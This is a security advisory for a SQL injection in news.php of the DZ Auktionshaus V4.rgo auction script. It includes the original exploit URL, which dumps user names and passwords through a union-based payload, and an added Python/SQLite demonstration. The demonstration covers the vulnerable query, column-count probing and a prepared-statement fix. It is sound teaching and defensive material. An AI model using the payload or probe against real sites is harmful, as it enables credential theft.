Vendor: V4.rgo
By: Easy Laster
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: V4.rgo
Affected Version From: V4.rgo
Affected Version To: V4.rgo
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
Year: 2010

DZ Auktionshaus “V4.rgo” (id) news.php SQL Injection

The vulnerability is in the 'news.php' script, which places the value of the 'id' GET parameter directly into an SQL query without validating it or binding it as a parameter. The published proof of concept is a classic union-based injection: it neutralises the original lookup with 'null', appends a UNION SELECT with the same number of columns as the original query (five), and puts 'concat(name,0x3a,password)' from the 'users' table in the third position, the one the page renders. A single crafted GET request therefore returns user names and password values from the database in the body of the news page. Any other table readable by the application's database account can be read the same way.

Mitigation:

Use parameterised queries (prepared statements) so that the value of 'id' is bound as data and can never alter the structure of the SQL statement. Because 'id' is a numeric identifier, additionally reject anything that is not a plain integer before it reaches the database layer. Filtering or escaping the input on its own is a weaker, error-prone defence and should not be the only control.

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : DZ Auktionshaus "V4.rgo" (id) news.php SQL Injection
+Author : Easy Laster
+Date : 08.03.2010
+Script : DZ Auktionshaus "V4.rgo"
+Price : 99,99€
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : http://server/auktionshaus/index.php?view=read&id=
+Exploitable   : http://server/auktionshaus/news.php?id=null+union+select+1,2,concat(name,0x3a,password),4,5+from+users#
-----------------------------------------------------------------------------------------
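The union-based payload above and the prepared-statement fix from the mitigation section, as an added worked example that is not part of the original advisory and not code from DZ Auktionshaus. It models a news.php-style lookup in Python over an in-memory SQLite database: the vulnerable query builder splices 'id' into the SQL text, the advisory payload is adapted to SQLite syntax ('||' in place of MySQL's concat()/0x3a and '--' in place of the '#' comment), a probe shows how an attacker arrives at the "5" in the payload, and a hardened builder validates and binds the parameter. The schema, the rows and the hashes are constructed sample data; the 'users' table and its 'name' and 'password' columns come from the payload, the 'news' table name and its columns are assumptions.

```python
"""Union-based SQL injection in a news.php-style 'id' lookup, and its fix.

Added example: a constructed Python/SQLite model of the flaw described in the
advisory, not the auction software's own code.
"""
import re
import sqlite3

# Constructed sample schema. 'users', 'name' and 'password' are the names the
# advisory payload uses; the 'news' table and its columns are assumed.
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT, posted TEXT);
INSERT INTO news VALUES (1, 'Welcome', 'First post', 'admin', '2010-03-01');
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
INSERT INTO users VALUES (2, 'easy',  'e10adc3949ba59abbe56e057f20f883e');
"""


def open_db():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def news_vulnerable(conn, id_param):
    """Mirrors the flaw: the raw GET parameter is concatenated into the SQL."""
    sql = "SELECT id, title, body, author, posted FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def news_fixed(conn, id_param):
    """Hardened lookup: reject anything but a plain integer, then bind it.

    re.fullmatch is used rather than str.isdigit(), which also accepts Unicode
    digits such as superscripts that int() would then reject."""
    if not re.fullmatch(r"[0-9]+", id_param):
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, title, body, author, posted FROM news WHERE id=?"
    return conn.execute(sql, (int(id_param),)).fetchall()


# SQLite rendering of the advisory payload
#   null+union+select+1,2,concat(name,0x3a,password),4,5+from+users#
# '||' stands in for concat() and the 0x3a colon, '--' for MySQL's '#' comment.
PAYLOAD = "null union select 1,2,name||':'||password,4,5 from users--"


def render_body(rows):
    """The page displays the third column (the article body) of every row,
    which is why the payload places the concatenated credentials there."""
    return [row[2] for row in rows]


def count_columns(conn, max_cols=10):
    """How the '5' in the payload is found: grow the UNION one column at a
    time until the database stops rejecting the mismatched column count."""
    for n in range(1, max_cols + 1):
        probe = "null union select " + ",".join(str(i) for i in range(1, n + 1)) + "--"
        try:
            news_vulnerable(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def exploit_vulnerable():
    """Credentials leaked through the vulnerable builder, as the page would show them."""
    return render_body(news_vulnerable(open_db(), PAYLOAD))


def exploit_fixed():
    """Same payload against the hardened builder: rejected before any SQL runs."""
    try:
        news_fixed(open_db(), PAYLOAD)
    except ValueError as err:
        return str(err)
    return "query executed"


if __name__ == "__main__":
    print("columns in original query:", count_columns(open_db()))
    print("vulnerable news.php leaks:", exploit_vulnerable())
    print("fixed news.php:", exploit_fixed())
```

The probe in count_columns is the same trick in reverse: the advisory's five-column payload only works because the news query selects five columns, and a mismatched UNION is a hard error that an attacker turns into an oracle. MySQL behaves the same way apart from the concat()/comment syntax.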